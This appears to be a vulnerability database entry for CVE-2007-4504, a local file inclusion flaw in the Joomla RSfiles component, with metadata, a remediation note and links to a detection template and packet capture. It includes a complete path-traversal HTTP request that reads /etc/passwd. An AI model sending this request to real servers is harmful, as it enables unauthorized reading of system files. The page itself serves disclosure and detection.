🔙 목록으로 돌아가기

CVE-2007-4504: Joomla! RSfiles <=1.0.2 - Local File Inclusion

TitleJoomla! RSfiles <=1.0.2 - Local File Inclusion
Authordaffainfo
SeverityMedium
ImpactSuccessful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution.
RemediationUpgrade to the latest version of Joomla! RSfiles or apply the necessary patches provided by the vendor.
CVSS Score5
EPSS Score0.00177
CVE IDCVE-2007-4504
CWE IDCWE-22
Tags cve2007 cve lfi edb joomla vuln

🔍 Vulnerability Description

Joomla! RSfiles 1.0.2 and earlier is susceptible to local file inclusion in index.php in the RSfiles component (com_rsfiles). This could allow remote attackers to arbitrarily read files via a .. (dot dot) in the path parameter in a files.display action.

🌐 HTTP Request

GET /index.php?option=com_rsfiles&task=files.display&path=../../../../../../../../../etc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2007/CVE-2007-4504.yaml

🦈 Packet Capture: ⬇️ Download cve-2007-4504.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A